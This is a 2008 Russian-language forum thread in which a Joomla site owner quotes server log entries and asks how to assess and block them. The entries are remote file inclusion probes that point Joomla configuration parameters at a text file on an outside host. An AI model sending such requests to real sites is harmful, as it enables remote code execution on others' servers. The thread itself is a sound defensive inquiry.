1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

уязвимость 1.0.15

Тема в разделе "Joomla", создана пользователем dima_1st, 28 апр 2008.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, Genk0, NightHunter
  1. dima_1st

    dima_1st Создатель

    Регистр.:
    11 апр 2008
    Сообщения:
    31
    Симпатии:
    35
    В логах сервера :

    записи от некого поисковика libwww-perl/5.63 :


    /web-sayt/administrator/components/com_joomlapack/includes/fPack.php?mosConfig_absolute_path=http://www.taow.net/league/id.txt?
    /web-sayt/administrator/index2.php?mosConfig_live_site=http://www.taow.net/league/id.txt?

    Чем грозит? и как проверить на другие уязвимости ?
     
  2. vasya999

    vasya999

    Регистр.:
    14 дек 2006
    Сообщения:
    310
    Симпатии:
    45
    эт не поисковик, это перловый скрипт из консоли такой юзерагент отдает.
    выполни и посмотри
    если уже описана в багтраке, то там и пример будет как проверить, а если нет (приват сплойт например) то никак.
     
  3. dima_1st

    dima_1st Создатель

    Регистр.:
    11 апр 2008
    Сообщения:
    31
    Симпатии:
    35
    В принципе ничего плохого он не сделает - его редиретит на главную. но сам факт напрягает, что кто то ползает по системным модулям.

    Вопрос такой а можно ли каким то образом запретить обращение к сайту такого робота ? .htaccess ?
     
Статус темы:
Закрыта.